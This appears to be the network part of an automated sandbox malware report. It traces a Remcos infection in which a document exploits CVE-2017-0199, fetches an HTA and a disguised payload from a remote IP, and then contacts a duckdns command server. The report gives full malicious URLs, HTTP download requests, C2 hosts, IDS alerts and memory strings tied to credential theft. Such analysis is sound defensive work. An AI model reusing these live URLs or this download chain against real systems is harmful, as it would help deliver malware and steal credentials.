                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49169

                  Networking

                  Source: Network traffic | Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: Network traffic | Suricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.22:49177 -> 142.93.65.161:80
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49179 -> 31.13.224.72:4044
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49178 -> 31.13.224.72:4044
                  Source: Network traffic | Suricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.22:49181 -> 142.93.65.161:80
                  Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 142.93.65.161:80 -> 192.168.2.22:49177
                  Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 142.93.65.161:80 -> 192.168.2.22:49177
                  Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 142.93.65.161:80 -> 192.168.2.22:49181
                  Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 142.93.65.161:80 -> 192.168.2.22:49181
                  Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 142.93.65.161:80 -> 192.168.2.22:49177
                  Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 142.93.65.161:80 -> 192.168.2.22:49177
                  Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.65.137:443 -> 192.168.2.22:49176
                  Source: Malware configuration extractor | URLs: lonan.duckdns.org
                  Source: unknown | DNS query: name: apamanollonan.duckdns.org
                  Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 31.13.224.72:4044
                  Source: global traffic | HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                      Host: res.cloudinary.com
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /680/SRVRER.txt HTTP/1.1
                      Host: 142.93.65.161
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1
                      Host: geoplugin.net
                      Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /680/SRVRER.txt HTTP/1.1
                      Host: 142.93.65.161
                      Connection: Keep-Alive
                  Source: Joe Sandbox View | IP Address: 178.237.33.50
                  Source: Joe Sandbox View | IP Address: 151.101.65.137
                  Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
                  Source: Joe Sandbox View | ASN Name: SARNICA-ASBG
                  Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49175 -> 142.93.65.161:80
                  Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49180 -> 178.237.33.50:80
                  Source: global traffic | HTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
                      Accept: */*
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: short.ruksk.com
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
                      Accept: */*
                      Accept-Language: fr-FR
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: short.ruksk.com
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
                      Accept: */*
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: short.ruksk.com
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
                      Accept: */*
                      Accept-Language: fr-FR
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: short.ruksk.com
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1
                      Accept: */*
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 142.93.65.161
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1
                      Accept: */*
                      Accept-Language: fr-FR
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Range: bytes=8896-
                      Connection: Keep-Alive
                      Host: 142.93.65.161
                      If-Range: "26ff2-6285702adf515"
                  Source: global traffic | HTTP traffic detected: GET /680/weneedkissingwellongirlfriendshebeautifulgirl.tIF HTTP/1.1
                      Accept: */*
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 142.93.65.161
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1
                      Accept: */*
                      Accept-Language: fr-FR
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      If-Modified-Since: Tue, 03 Dec 2024 05:33:52 GMT
                      Connection: Keep-Alive
                      Host: 142.93.65.161
                      If-None-Match: "26ff2-6285702adf515"
                  Source: unknown | HTTPS traffic detected: 151.101.65.137:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: unknown | TCP traffic detected without corresponding DNS query: 142.93.65.161
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_000007FE899C7018 URLDownloadToFileW,7_2_000007FE899C7018
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8531221.emf
                  Source: bhv5265.tmp.29.dr | String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exe, CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001D.00000002.547955007.000000000029C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001D.00000002.547955007.000000000029C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: bhv5265.tmp.29.dr | String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global traffic | DNS traffic detected: DNS query: short.ruksk.com
                  Source: global traffic | DNS traffic detected: DNS query: res.cloudinary.com
                  Source: global traffic | DNS traffic detected: DNS query: apamanollonan.duckdns.org
                  Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                  Source: mshta.exe, 00000004.00000003.446100049.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487780679.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.0000000003A20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/
                  Source: mshta.exe, 00000004.00000003.446100049.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/6
                  Source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/680/weneedk
                  Source: powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF
                  Source: powershell.exe, 00000007.00000002.473316971.000000001A7C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF1
                  Source: powershell.exe, 00000007.00000002.473316971.000000001A7C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFA
                  Source: powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFC:
                  Source: powershell.exe, 00000012.00000002.505196924.000000001A931000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFa%0I
                  Source: powershell.exe, 00000012.00000002.505196924.000000001A931000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFk%0I
                  Source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFp
                  Source: mshta.exe, 0000000E.00000003.486492468.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.0000000000131000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
                  Source: mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...
                  Source: mshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...0n
                  Source: mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...r
                  Source: mshta.exe, 00000004.00000002.446412500.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446132664.000000000014E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...rTm
                  Source: mshta.exe, 0000000E.00000002.493049973.00000000039A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htaG
                  Source: mshta.exe, 0000000E.00000003.490334526.0000000000188000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.0000000000188000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.0000000000188000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htacC:
                  Source: mshta.exe, 00000004.00000002.446594569.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htaeHP
                  Source: mshta.exe, 00000004.00000003.443541028.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445667762.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.488460874.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htahttp://142.93.65.1
                  Source: mshta.exe, 0000000E.00000002.493049973.00000000039A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htak
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htapC:
                  Source: mshta.exe, 0000000E.00000003.486492468.0000000000131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&XKy
                  Source: mshta.exe, 00000004.00000003.440649981.0000000000162000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446606437.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&pacemaker
                  Source: mshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&pacemakerTK
                  Source: mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htay
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: mshta.exe, 00000004.00000003.446057103.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
